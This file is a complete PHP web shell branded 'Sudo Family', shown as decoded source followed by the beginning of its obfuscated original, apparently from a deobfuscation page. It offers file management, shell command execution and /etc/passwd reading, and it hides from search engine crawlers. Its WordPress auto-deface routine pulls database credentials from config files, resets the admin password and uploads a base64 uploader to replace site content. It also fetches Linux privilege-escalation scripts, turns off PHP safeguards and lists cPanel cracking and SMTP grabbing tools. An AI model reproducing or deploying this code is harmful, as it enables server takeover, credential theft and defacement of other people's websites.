curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt"); curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt"); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data = curl_exec($ch); curl_close($ch); return $data; } $link = explode("\xd
", $_POST["link"]); $script = htmlspecialchars($_POST["script"]); $user = "indoxploit"; $pass = "indoxploit"; $passx = md5($pass); foreach ($link as $dir_config) { $config = anucurl($dir_config); $dbhost = ambilkata($config, "DB_HOST', '", "'"); $dbuser = ambilkata($config, "DB_USER', '", "'"); $dbpass = ambilkata($config, "DB_PASSWORD', '", "'"); $dbname = ambilkata($config, "DB_NAME', '", "'"); $dbprefix = ambilkata($config, "table_prefix = '", "'"); $prefix = $dbprefix . "users"; $option = $dbprefix . "options"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM {$prefix} ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM {$option} ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; if ($target == '') { echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>"; } else { echo "[+] {$target} <br>"; } $update = mysql_query("UPDATE {$prefix} SET user_login='{$user}',user_pass='{$passx}' WHERE ID='{$id}'"); if (!$conn or !$db or !$update) { echo "[-] MySQL Error: <font color=red>" . mysql_error() . "</font><br><br>"; mysql_close($conn); } else { $site = "{$target}/wp-login.php"; $site2 = "{$target}/wp-admin/theme-install.php?upload"; $b1 = anucurl($site2); $wp_sub = ambilkata($b1, "id="wp-submit" class="button button-primary button-large" value="", "" />"); $b = lohgin($site, $site2, $user, $pass, $wp_sub); $anu2 = ambilkata($b, "name="_wpnonce" value="", "" />"); $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg=="); $www = "m.php"; $fp5 = fopen($www, "w"); fputs($fp5, $upload3); $post2 = array("_wpnonce" => "{$anu2}", "_wp_http_referer" => "/wp-admin/theme-install.php?upload", "themezip" => "@{$www}", "install-theme-submit" => "Install Now"); $ch = curl_init("{$target}/wp-admin/update.php?action=upload-theme"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post2); curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt"); curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt"); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data3 = curl_exec($ch); curl_close($ch); $y = date("Y"); $m = date("m"); $namafile = "id.php"; $fpi = fopen($namafile, "w"); fputs($fpi, $script); $ch6 = curl_init("{$target}/wp-content/uploads/{$y}/{$m}/{$www}"); curl_setopt($ch6, CURLOPT_POST, true); curl_setopt($ch6, CURLOPT_POSTFIELDS, array("file3" => "@{$namafile}")); curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt"); curl_setopt($ch6, CURLOPT_COOKIEJAR, "cookie.txt"); curl_setopt($ch6, CURLOPT_COOKIESESSION, true); $postResult = curl_exec($ch6); curl_close($ch6); $as = "{$target}/k.php"; $bs = anucurl($as); if (preg_match("#{$script}#is", $bs)) { echo "[+] <font color='lime'>berhasil mepes...</font><br>"; echo "[+] <a href='{$as}' target='_blank'>{$as}</a><br><br>"; } else { echo "[-] <font color='red'>gagal mepes...</font><br>"; echo "[!!] coba aja manual: <br>"; echo "[+] <a href='{$target}/wp-login.php' target='_blank'>{$target}/wp-login.php</a><br>"; echo "[+] username: <font color=lime>{$user}</font><br>"; echo "[+] password: <font color=lime>{$pass}</font><br><br>"; } mysql_close($conn); } } } else { echo "<center><h1>WordPress Auto Deface V.2</h1>\xa <form method='post'>
\x9Link Config: <br>\xa\x9\x9<textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>\xa <input type='text' name='script' height='10' size='50' placeholder='Hacked By 0x1999' required><br>\xa\x9\x9<input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hack!!'>\xa\x9 </form></center>"; } } elseif ($_GET["act"] == "newfile") { if ($_POST["new_save_file"]) { $newfile = htmlspecialchars($_POST["newfile"]); $fopen = fopen($newfile, "a+"); if ($fopen) { $act = "<script>window.location='?act=edit&dir=" . $dir . "&file=" . $_POST["newfile"] . "';</script>"; } else { $act = "<font color=red>permission denied</font>"; } } echo $act; echo "<form method='post'>\xa Filename: <input type='text' name='newfile' value='{$dir}/newfile.php' style='width: 450px;' height='10'>
\x9<input type='submit' name='new_save_file' value='Submit'>
</form>"; } elseif ($_GET["act"] == "newfolder") { if ($_POST["new_save_folder"]) { $new_folder = $dir . "/" . htmlspecialchars($_POST["newfolder"]); if (!mkdir($new_folder)) { $act = "<font color=red>permission denied</font>"; } else { $act = "<script>window.location='?dir=" . $dir . "';</script>"; } } echo $act; echo "<form method='post'>\xa Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
\x9<input type='submit' name='new_save_folder' value='Submit'>
\x9</form>"; } elseif ($_GET["act"] == "rename_dir") { if ($_POST["dir_rename"]) { $dir_rename = rename($dir, '' . dirname($dir) . "/" . htmlspecialchars($_POST["fol_rename"]) . ''); if ($dir_rename) { $act = "<script>window.location='?dir=" . dirname($dir) . "';</script>"; } else { $act = "<font color=red>permission denied</font>"; } echo '' . $act . "<br>"; } echo "<form method='post'>\xa\x9<input type='text' value='" . basename($dir) . "' name='fol_rename' style='width: 450px;' height='10'>\xa <input type='submit' name='dir_rename' value='rename'>
</form>"; } elseif ($_GET["act"] == "delete_dir") { function Delete($path) { if (is_dir($path) === true) { $files = array_diff(scandir($path), array(".", "..")); foreach ($files as $file) { Delete(realpath($path) . "/" . $file); } return rmdir($path); } else { if (is_file($path) === true) { return unlink($path); } } return false; } $delete_dir = Delete($dir); if ($delete_dir) { $act = "<script>window.location='?dir=" . dirname($dir) . "';</script>"; } else { $act = "<font color=red>could not remove " . basename($dir) . "</font>"; } echo $act; } elseif ($_GET["act"] == "view") { echo "Filename: <font color=lime>" . basename($_GET["file"]) . "</font> [ <a href='?act=view&dir={$dir}&file=" . $_GET["file"] . "'><b>view</b></a> ] [ <a href='?act=edit&dir={$dir}&file=" . $_GET["file"] . "'>edit</a> ] [ <a href='?act=rename&dir={$dir}&file=" . $_GET["file"] . "'>rename</a> ] [ <a href='?act=download&dir={$dir}&file=" . $_GET["file"] . "'>download</a> ] [ <a href='?act=delete&dir={$dir}&file=" . $_GET["file"] . "'>delete</a> ]<br>"; echo "<textarea readonly>" . htmlspecialchars(@file_get_contents($_GET["file"])) . "</textarea>"; } elseif ($_GET["act"] == "edit") { if ($_POST["save"]) { $save = file_put_contents($_GET["file"], $_POST["src"]); if ($save) { $act = "<font color=lime>Saved!</font>"; } else { $act = "<font color=red>permission denied</font>"; } echo '' . $act . "<br>"; } echo "Filename: <font color=lime>" . basename($_GET["file"]) . "</font> [ <a href='?act=view&dir={$dir}&file=" . $_GET["file"] . "'>view</a> ] [ <a href='?act=edit&dir={$dir}&file=" . $_GET["file"] . "'><b>edit</b></a> ] [ <a href='?act=rename&dir={$dir}&file=" . $_GET["file"] . "'>rename</a> ] [ <a href='?act=download&dir={$dir}&file=" . $_GET["file"] . "'>download</a> ] [ <a href='?act=delete&dir={$dir}&file=" . $_GET["file"] . "'>delete</a> ]<br>"; echo "<form method='post'>
<textarea name='src'>" . htmlspecialchars(@file_get_contents($_GET["file"])) . "</textarea><br>\xa\x9<input type='submit' value='Save' name='save' style='width: 500px;'>\xa </form>"; } elseif ($_GET["act"] == "rename") { if ($_POST["do_rename"]) { $rename = rename($_GET["file"], "{$dir}/" . htmlspecialchars($_POST["rename"]) . ''); if ($rename) { $act = "<script>window.location='?dir=" . $dir . "';</script>"; } else { $act = "<font color=red>permission denied</font>"; } echo '' . $act . "<br>"; } echo "Filename: <font color=lime>" . basename($_GET["file"]) . "</font> [ <a href='?act=view&dir={$dir}&file=" . $_GET["file"] . "'>view</a> ] [ <a href='?act=edit&dir={$dir}&file=" . $_GET["file"] . "'>edit</a> ] [ <a href='?act=rename&dir={$dir}&file=" . $_GET["file"] . "'><b>rename</b></a> ] [ <a href='?act=download&dir={$dir}&file=" . $_GET["file"] . "'>download</a> ] [ <a href='?act=delete&dir={$dir}&file=" . $_GET["file"] . "'>delete</a> ]<br>"; echo "<form method='post'>\xa\x9<input type='text' value='" . basename($_GET["file"]) . "' name='rename' style='width: 450px;' height='10'>
<input type='submit' name='do_rename' value='rename'>\xa\x9</form>"; } elseif ($_GET["act"] == "delete") { $delete = unlink($_GET["file"]); if ($delete) { $act = "<script>window.location='?dir=" . $dir . "';</script>"; } else { $act = "<font color=red>permission denied</font>"; } echo $act; } else { if (is_dir($dir) == true) { echo "<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
\x9\x9<tr>
\x9\x9<th class="th_home"><center>Name</center></th>\xa <th class="th_home"><center>Type</center></th>
\x9\x9<th class="th_home"><center>Size</center></th>
\x9<th class="th_home"><center>Last Modified</center></th>
\x9\x9<th class="th_home"><center>Permission</center></th>
\x9 <th class="th_home"><center>Action</center></th>
\x9</tr>"; $scandir = scandir($dir); foreach ($scandir as $dirx) { $dtype = filetype("{$dir}/{$dirx}"); $dtime = date("F d Y g:i:s", filemtime("{$dir}/{$dirx}")); if (!is_dir("{$dir}/{$dirx}")) { continue; } if ($dirx === "..") { $href = "<a href='?dir=" . dirname($dir) . "'>{$dirx}</a>"; } elseif ($dirx === ".") { $href = "<a href='?dir={$dir}'>{$dirx}</a>"; } else { $href = "<a href='?dir={$dir}/{$dirx}'>{$dirx}</a>"; } if ($dirx === "." || $dirx === "..") { $act_dir = "<a href='?act=newfile&dir={$dir}'>newfile</a> | <a href='?act=newfolder&dir={$dir}'>newfolder</a>"; } else { $act_dir = "<a href='?act=rename_dir&dir={$dir}/{$dirx}'>rename</a> | <a href='?act=delete_dir&dir={$dir}/{$dirx}'>delete</a>"; } echo "<tr>"; echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA" . "AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp" . "/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>{$href}</td>"; echo "<td class='td_home'><center>{$dtype}</center></td>"; echo "<td class='td_home'><center>-</center></th>"; echo "<td class='td_home'><center>{$dtime}</center></td>"; echo "<td class='td_home'><center>" . w("{$dir}/{$dirx}", perms("{$dir}/{$dirx}")) . "</center></td>"; echo "<td class='td_home' style='padding-left: 15px;'>{$act_dir}</td>"; } echo "</tr>"; foreach ($scandir as $file) { $ftype = filetype("{$dir}/{$file}"); $ftime = date("F d Y g:i:s", filemtime("{$dir}/{$file}")); $size = filesize("{$dir}/{$file}") / 1024; $size = round($size, 3); if ($size > 1024) { $size = round($size / 1024, 2) . "MB"; } else { $size = $size . "KB"; } if (!is_file("{$dir}/{$file}")) { continue; } echo "<tr>"; echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir={$dir}&file={$dir}/{$file}'>{$file}</a></td>"; echo "<td class='td_home'><center>{$ftype}</center></td>"; echo "<td class='td_home'><center>{$size}</center></td>"; echo "<td class='td_home'><center>{$ftime}</center></td>"; echo "<td class='td_home'><center>" . w("{$dir}/{$file}", perms("{$dir}/{$file}")) . "</center></td>"; echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir={$dir}&file={$dir}/{$file}'>edit</a> | <a href='?act=rename&dir={$dir}&file={$dir}/{$file}'>rename</a> | <a href='?act=delete&dir={$dir}&file={$dir}/{$file}'>delete</a> | <a href='?act=download&dir={$dir}&file={$dir}/{$file}'>download</a></td>"; } echo "</tr></table>"; } else { echo "<font color=red>can't open directory</font>"; } } goto FbEMB; ozjW3: echo "<li>[ <a href='?dir={$dir}&do=auto_dwp'>WordPress Auto Deface</a> ]</li>"; goto oa5vY; oN4Wq: echo "<li>[ <a href='?dir={$dir}&do=shellchk'>Shell Checker</a> ]</li>"; goto Knirt; fx5k6: @ini_set("max_execution_time", 0); goto p3bLB; CI5k9: foreach ($scdir as $c_dir => $cdir) { echo "<a href='?dir="; for ($i = 0; $i <= $c_dir; $i++) { echo $scdir[$i]; if ($i != $c_dir) { echo "/"; } } echo "'>{$cdir}</a>/"; } goto i0ZTx; cIIZt: echo "<li>[ <a href='?dir={$dir}&do=upload'>Upload</a> ]</li>"; goto fnUh4; bi8zb: if (!function_exists("posix_getegid")) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid["name"]; $uid = $uid["uid"]; $group = $gid["name"]; $gid = $gid["gid"]; } goto KSQHh; Jg1Vp: echo "<tr><td>User: <font color=lime>" . $user . "</font> (" . $uid . ") Group: <font color=lime>" . $group . "</font> (" . $gid . ")</td></tr>"; goto mKYab; KpDSL: CreateTools("LinEnu", "https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); goto JOCoy; NeUvg: $auth_pass = "7cfb3bf53a4d586d3721433863783825"; goto nIl58; dprgE: echo "<li>[ <a href='?dir={$dir}&do=cpanel'>CPanel Crack</a> ]</li>"; goto FhERQ; XP6Ww: @set_magic_quotes_runtime(0); goto hy4jF; jH7rn: echo "<li>[ <a href='?dir={$dir}&do=mass_deface'>Mass Deface</a> ]</li>"; goto I5Yfd; tKZOx: $show_ds = !empty($ds) ? "<font color=red>{$ds}</font>" : "<font color=lime>NONE</font>"; goto bi8zb; s0LnO: @ini_set("log_errors", 0); goto fx5k6; D_0ZZ: echo "<tr><td>Port :<font color=lime> {$sport}</font> </td></tr>"; goto CDb2j; FlmmB: $perl = exe("perl --help") ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; goto Q3IR8; yKdsw: function CreateTools($names, $lokasi) { if ($_GET["create"] == $names) { $a = '' . $_SERVER["SERVER_NAME"] . ''; $b = dirname($_SERVER["PHP_SELF"]); $c = "/enu_script/" . $names . ".sh"; if (file_exists("enu_script/" . $names . ".sh")) { echo "<script type="text/javascript">alert("Done");window.location.href = "enu_script/" . $names . ".sh";</script> "; } else { mkdir("enu_script", 511); file_put_contents("enu_script/" . $names . ".sh", file_get_contents($lokasi)); echo " <script type="text/javascript">alert("Done, script are in /enu_script drie :3");window.location.href = "enu_script/" . $names . ".sh";</script> "; } } } goto fYm5d; b0T7h: function perms($file) { $perms = fileperms($file); if (($perms & 49152) == 49152) { $info = "s"; } elseif (($perms & 40960) == 40960) { $info = "l"; } elseif (($perms & 32768) == 32768) { $info = "-"; } elseif (($perms & 24576) == 24576) { $info = "b"; } elseif (($perms & 16384) == 16384) { $info = "d"; } elseif (($perms & 8192) == 8192) { $info = "c"; } elseif (($perms & 4096) == 4096) { $info = "p"; } else { $info = "u"; } $info .= $perms & 256 ? "r" : "-"; $info .= $perms & 128 ? "w" : "-"; $info .= $perms & 64 ? $perms & 2048 ? "s" : "x" : ($perms & 2048 ? "S" : "-"); $info .= $perms & 32 ? "r" : "-"; $info .= $perms & 16 ? "w" : "-"; $info .= $perms & 8 ? $perms & 1024 ? "s" : "x" : ($perms & 1024 ? "S" : "-"); $info .= $perms & 4 ? "r" : "-"; $info .= $perms & 2 ? "w" : "-"; $info .= $perms & 1 ? $perms & 512 ? "t" : "x" : ($perms & 512 ? "T" : "-"); return $info; } goto Lm7kd; qs3Cf: if (!empty($_SERVER["HTTP_USER_AGENT"])) { $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot"); if (preg_match("/" . implode("|", $userAgents) . "/i", $_SERVER["HTTP_USER_AGENT"])) { header("HTTP/1.0 404 Not Found"); die; } } goto G0DvU; oa5vY: echo "<li>[ <a href='?dir={$dir}&do=auto_dwp2'>WordPress Auto Deface V.2</a> ]</li>"; goto rf0wp; fnUh4: echo "<li>[ <a href='?dir={$dir}&do=cmd'>Command</a> ]</li>"; goto jH7rn; J1fnQ: echo "<ul>"; goto k9MqC; xQf2A: if (isset($_GET["file"]) && $_GET["file"] != '' && $_GET["act"] == "download") { @ob_clean(); $file = $_GET["file"]; header("Content-Description: File Transfer"); header("Content-Type: application/octet-stream"); header("Content-Disposition: attachment; filename="" . basename($file) . """); header("Expires: 0"); header("Cache-Control: must-revalidate"); header("Pragma: public"); header("Content-Length: " . filesize($file)); readfile($file); die; } goto fIVrs; hOAue: session_start(); goto E0dHZ; AjGjJ: echo "<tr><td>Current DIR: "; goto CI5k9; osRPZ: echo "</ul>"; goto zOQmB; lFDuc: $dir = str_replace("\", "/", $dir); goto YTSct; Bk7Av: set_time_limit(0); goto XP6Ww; Lm7kd: function hdd($s) { if ($s >= 1073741824) { return sprintf("%1.2f", $s / 1073741824) . " GB"; } elseif ($s >= 1048576) { return sprintf("%1.2f", $s / 1048576) . " MB"; } elseif ($s >= 1024) { return sprintf("%1.2f", $s / 1024) . " KB"; } else { return $s . " B"; } } goto ZoXkF; RBPXg: echo "<table style='width:100%'>"; goto SmpFc; B1szS: if ($d0mains) { $count; foreach ($d0mains as $d0main) { if (@ereg("zone", $d0main)) { preg_match_all("#zone "(.*)"#", $d0main, $domains); flush(); if (strlen(trim($domains[1][0])) > 2) { flush(); $count++; } } } } goto FpftJ; G0DvU: function login_shell() { ?>
<html><head><title>Sudo Family :: Myanmar youth hacker</title><style type="text/css">html{margin:20px auto;background:#000;color:green;text-align:center}header{color:green;margin:10px auto}input[type=password]{width:250px;height:25px;color:red;background:#fff;border:1px dotted green;padding:5px;margin-left:20px;text-align:center}</style></head><center><header><br><br><form method="post"><center><a href="https://freeimage.host/"><img alt="0ZZ5Rs.jpg"border="0"src="https://iili.io/0ZZ5Rs.jpg"></a><br><input name="pass"type="password"></form><?php die; } goto qS2hq; rhmdN: echo "<li>[ <a href='?dir={$dir}&do=cgi'>CGI Telnet</a> ]</li><br>"; goto HnvhT; j4gEb: echo "<li>[ <a href='?dir={$dir}&do=zip'>Zip Menu</a> ]</li>"; goto RC49a; FhERQ: echo "<li>[ <a href='?dir={$dir}&do=smtp'>SMTP Grabber</a> ]</li>"; goto eF3h9; ryNNe: echo "<tr><td>Disable Functions: {$show_ds}</td></tr>"; goto YWJkV; pPSA4: $wget = exe("wget --help") ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; goto FlmmB; hu4Fd: $default_action = "FilesMan"; goto ZsvGm; axCEd: @ini_set("error_log", NULL); goto s0LnO; ZoXkF: function ambilKata($param, $kata1, $kata2) { if (strpos($param, $kata1) === FALSE) { return FALSE; } if (strpos($param, $kata2) === FALSE) { return FALSE; } $start = strpos($param, $kata1) + strlen($kata1); $end = strpos($param, $kata2, $start); $return = substr($param, $start, $end - $start); return $return; } goto Skaey; qS2hq: if (!isset($_SESSION[md5($_SERVER["HTTP_HOST"])])) { if (empty($auth_pass) || isset($_POST["pass"]) && md5($_POST["pass"]) == $auth_pass) { $_SESSION[md5($_SERVER["HTTP_HOST"])] = true; } else { login_shell(); } } goto xQf2A; lDjYb: $default_charset = "UTF-8"; goto qs3Cf; Tq01b: echo "<li>[ <a href='?dir={$dir}&do=auto_wp'>Auto Edit Title WordPress</a> ]</li>"; goto ozjW3; iHrZU: echo "<tr><td>Websites :<font color=lime> {$count} </font> Domains</td></tr>"; goto D_0ZZ; SLvTF: function exe($cmd) { if (function_exists("system")) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif (function_exists("exec")) { @exec($cmd, $results); $buff = ''; foreach ($results as $result) { $buff .= $result; } return $buff; } elseif (function_exists("passthru")) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif (function_exists("shell_exec")) { $buff = @shell_exec($cmd); return $buff; } } goto b0T7h; sSbF1: CreateTools("bashark", "https://raw.githubusercontent.com/redcode-labs/Bashark/master/bashark.sh"); goto X2ZwW; x0bfQ: echo "<li>[ <a href='?dir={$dir}&do=metu'>LogOut</a> ]<br></li>"; goto osRPZ; UCGcg: CreateTools("peass-ng", "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh"); goto ZDo2T; Dw0eC: echo "<li>[ <a href='?dir={$dir}&do=symlink'>Symlink</a> ]<br></li>"; goto dprgE; fYm5d: CreateTools("lse", "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh"); goto UCGcg; DWK4s: $sm = @ini_get(strtolower("safe_mode")) == "on" ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>"; goto W2iG7; k9MqC: echo "<li>[ <a href='?'>Home</a> ]</li>"; goto cIIZt; W2iG7: $ling = "http://" . $_SERVER["SERVER_NAME"] . '' . $_SERVER["PHP_SELF"] . "?create"; goto n5p0r; fIVrs: ?>
<html><head><center><title>! SuD0 FAMiLY !</title><meta content="SudO Family!"name="author"><meta charset="UTF-8"><center><style type="text/css">@import url(https://fonts.googleapis.com/css?family=Ubuntu);html{background:url(https://4.bp.blogspot.com/-xTmw3tsMVDY/WAsldFnFfyI/AAAAAAAAIAM/a-t4T5U7UfI8EZE0frjNCUYQ6Rx1r4uzQCLcB/s1600/Hacker%2BBackground%2B7.jpg);color:red;font-family:abel;font-size:13px;width:100%}li{display:inline;margin:5px;padding:5px}table,td,th{border-collapse:collapse;font-family:Tahoma,Geneva,sans-serif;background:0 0;font-family:abel;font-size:13px}.table_home,.td_home,.th_home{border:1px solid #f51d1d}th{padding:10px}a{color:#19ce19;text-decoration:none}a:hover{color:gold;text-decoration:underline}b{color:gold}input[type=password],input[type=submit],input[type=text]{background:0 0;color:#fff;border:1px solid #fff;margin:5px auto;padding-left:5px;font-family:abel;font-size:13px}textarea{border:1px solid #fff;width:100%;height:400px;font-weight:900;padding-left:5px;margin:10px auto;resize:none;background:0 0;color:#1de4a8;font-family:abel;font-size:13px}select{width:152px;background:#000;color:#0ff;border:1px solid #fff;margin:5px auto;padding-left:5px;font-family:abel;font-size:13px}option:hover{background:#0ff;color:#000}</style></head><center><?php goto cDEsx; Q3IR8: $python = exe("python --help") ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; goto tKZOx; RC49a: echo "<li>[ <a href='?dir={$dir}&do=about'>About</a> ]</li>"; goto x0bfQ; n5p0r: $ds = @ini_get("disable_functions"); goto Y4IOJ; ZDo2T: CreateTools("private", "https://raw.githubusercontent.com/rtcrowley/linux-private-i/master/private-i.sh"); goto KpDSL; E0dHZ: error_reporting(0); goto Bk7Av; rf0wp: echo "<li>[ <a href='?dir={$dir}&do=passwbypass'>Bypass etc/passw</a> ]<br></li>"; goto lL2r1; lL2r1: echo "<li>[ <a href='?dir={$dir}&do=loghunter'>Log Hunter</a> ]</li>"; goto oN4Wq; I5Yfd: echo "<li>[ <a href='?dir={$dir}&do=config'>Config</a> ]</li>"; goto F2emA; i0ZTx: echo "</td></tr></table><hr>"; goto Wmtoe; FrCPJ: echo "<hr>"; goto HMHCF; eF3h9: echo "<li>[ <a href='?dir={$dir}&do=zoneh'>Zone-H</a> ]</li>"; goto m9Ss5; JOCoy: CreateTools("les", "https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh"); goto sSbF1; a1GtA: function w($dir, $perm) { if (!is_writable($dir)) { return "<font color=red>" . $perm . "</font>"; } else { return "<font color=lime>" . $perm . "</font>"; } } goto SLvTF; WpTW0: $users = @file("/etc/passwd"); goto B1szS; nIl58: $color = "#FF0000"; goto hu4Fd; SmpFc: echo "<tr><td>System: <font color=lime>" . php_uname() . "</font></td></tr>"; goto Jg1Vp; mKYab: echo "<tr><td>Server IP: <font color=lime>" . gethostbyname($_SERVER["HTTP_HOST"]) . "</font> | Your IP: <font color=lime>" . $_SERVER["REMOTE_ADDR"] . "</font></td></tr>"; goto JLYm1; cDEsx: if (file_exists("php.ini")) { } else { $img = fopen("php.ini", "w"); $sec = "safe_mode = OFF
disable_funtions = NONE"; fwrite($img, $sec); fclose($img); } goto a1GtA; JLYm1: echo "<tr><td>HDD: <font color=lime>" . hdd(disk_free_space("/")) . "</font> / <font color=lime>" . hdd(disk_total_space("/")) . "</font></td></tr>"; goto iHrZU; YTSct: $scdir = explode("/", $dir); goto DWK4s; Knirt: echo "<li>[ <a href='?dir={$dir}&do=shelscan'>Shell Finder</a> ]</li>"; goto j4gEb; CDb2j: echo "<tr><td>Safe Mode: {$sm}</td></tr>"; goto ryNNe; ZsvGm: $default_use_ajax = true; goto lDjYb; F2emA: echo "<li>[ <a href='?dir={$dir}&do=lcf'>LiteSpeed Config</a> ]</li>"; goto bhf0C; KSQHh: $d0mains = @file("/etc/named.conf"); goto WpTW0; HnvhT: echo "<li>[ <a href='?dir={$dir}&do=adminer'>Adminer</a> ]</li>"; goto JJlv1; FpftJ: $sport = $_SERVER["SERVER_PORT"]; goto RBPXg; Lule7: ?>
</html>Did this file decode correctly?
Original Code
<?php
goto hOAue; qJRhe: echo "\x3c\x6c\x69\x3e\133\x20\74\141\40\150\162\145\x66\x3d\47\x3f\x64\151\162\75{$dir}\46\x64\x6f\75\141\x75\164\x6f\x5f\145\x64\151\x74\137\165\163\145\x72\47\x3e\x41\165\x74\157\x20\105\x64\151\x74\x20\125\163\x65\x72\x3c\x2f\x61\76\x20\135\74\x2f\154\x69\x3e"; goto Tq01b; hy4jF: @clearstatcache(); goto axCEd; TJKkB: @ini_set("\x64\x69\x73\x70\154\141\x79\137\x65\x72\162\157\162\163", 0); goto NeUvg; Wmtoe: echo "\x3c\143\145\x6e\164\x65\162\x3e"; goto J1fnQ; Skaey: if (get_magic_quotes_gpc()) { function idx_ss($array) { return is_array($array) ? array_map("\151\144\170\137\x73\x73", $array) : stripslashes($array); } $_POST = idx_ss($_POST); } goto yKdsw; YWJkV: echo "\74\x74\162\76\74\164\x64\76\x4d\x79\123\121\x4c\72\x20{$mysql}\40\174\40\120\x65\162\x6c\x3a\x20{$perl}\x20\174\40\120\171\164\150\157\x6e\x3a\x20{$python}\40\174\40\127\x47\105\x54\72\40{$wget}\40\174\x20\103\125\x52\x4c\72\x20{$curl}\x20\74\x2f\x74\144\76\x3c\x2f\164\162\76"; goto AjGjJ; p3bLB: @ini_set("\157\x75\164\160\x75\x74\x5f\x62\165\146\146\145\x72\x69\156\147", 0); goto TJKkB; m9Ss5: echo "\x3c\x6c\x69\76\x5b\40\74\x61\x20\x68\x72\x65\x66\75\47\x3f\x64\x69\162\75{$dir}\46\144\157\75\144\x65\x66\x61\143\x65\x72\151\144\47\76\104\145\x66\141\143\145\x72\x2e\111\x44\x3c\x2f\141\x3e\40\135\x3c\57\x6c\151\x3e"; goto rhmdN; JJlv1: echo 